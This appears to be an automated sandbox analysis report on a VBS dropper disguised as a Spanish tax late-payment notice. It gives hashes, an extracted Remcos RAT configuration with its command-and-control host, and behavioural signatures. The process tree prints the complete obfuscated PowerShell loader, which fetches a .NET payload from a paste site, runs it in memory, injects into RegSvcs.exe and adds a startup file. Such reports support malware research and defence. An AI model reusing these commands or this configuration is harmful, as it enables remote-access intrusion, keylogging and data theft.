Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
06-10-2022 10:10
Static task
static1
Behavioral task
behavioral1
Sample
Administración Tributaria pagos atrasados.vbs
Resource
win7-20220812-en
General
-
Target
Administración Tributaria pagos atrasados.vbs
-
Size
201KB
-
MD5
0b4dc1bb49165555906e0a54ba35c40c
-
SHA1
5cc413e6b260a6d12f8cd7f89f60864d6616185f
-
SHA256
3a649ff19adaa0be44bdb367250683c93a350edf38b7ffb9d86559749b854fbc
-
SHA512
8100fb1ad8a3106d3eaeb7425b6c748b347384e2b5209a131cad325a53f031e7f9a8e4960117d4e5f026bbf985682e9fce07899404e75a23b4ccb1dd6971596b
-
SSDEEP
96:dyYRYFYDC3HFYSx9AXnXwEUfK2AUB/0zfNEWUvGcZ1+AN1qHk:d9uaYHFYH3AdfK2RB/0zfHcZJ1qE
Malware Config
Extracted
https://pasteio.com/download/xBVTIS53dQcN
Extracted
remcos
roda7
defenderos2.con-ip.com:2425
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
r7uopsssa.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Sbnsdcvvqq-54AH7S
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 5 3984 powershell.exe 9 3984 powershell.exe 12 3984 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d3vEukKaERTJu.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d3vEukKaERTJu.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3984 set thread context of 2916 3984 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2656 powershell.exe 2656 powershell.exe 3984 powershell.exe 3984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
RegSvcs.exepid process 2916 RegSvcs.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1496 wrote to memory of 2656 1496 WScript.exe powershell.exe PID 1496 wrote to memory of 2656 1496 WScript.exe powershell.exe PID 2656 wrote to memory of 3984 2656 powershell.exe powershell.exe PID 2656 wrote to memory of 3984 2656 powershell.exe powershell.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe PID 3984 wrote to memory of 2916 3984 powershell.exe RegSvcs.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCvAL0AvgDkAK8ArwClAL0AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBpAG8ALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZAAvAHgAQgBWAFQASQBTAD⌚⌚⌚AMwBkAFEAYwBOACcAKQApADsAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcATgB3AGcAbwB4AE0ALgBLAFAASgBhAE4AagAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcA⌚⌚⌚ABVAGwARwBLAEEAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAMAAvAE⌚⌚⌚AdgAzAGQAMQAvAGQALwBlAG⌚⌚⌚ALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBkADMAdgBFAH⌚⌚⌚AawBLAGEARQBSAFQASgB1ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¯½¾ä¯¯¥½', 'C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xBVTIS53dQcN'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('0/Ev3d1/d/ee.etsap//:sptth' , $RodaCopy , 'd3vEukKaERTJu' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
memory/2656-132-0x0000000000000000-mapping.dmp
-
memory/2656-133-0x000001F02E1B0000-0x000001F02E1D2000-memory.dmpFilesize
136KB
-
memory/2656-144-0x00007FFC52A60000-0x00007FFC53521000-memory.dmpFilesize
10.8MB
-
memory/2656-135-0x00007FFC52A60000-0x00007FFC53521000-memory.dmpFilesize
10.8MB
-
memory/2916-138-0x00000000004327A4-mapping.dmp
-
memory/2916-139-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2916-141-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2916-137-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2916-145-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/2916-146-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3984-140-0x00007FFC52A60000-0x00007FFC53521000-memory.dmpFilesize
10.8MB
-
memory/3984-136-0x00007FFC52A60000-0x00007FFC53521000-memory.dmpFilesize
10.8MB
-
memory/3984-134-0x0000000000000000-mapping.dmp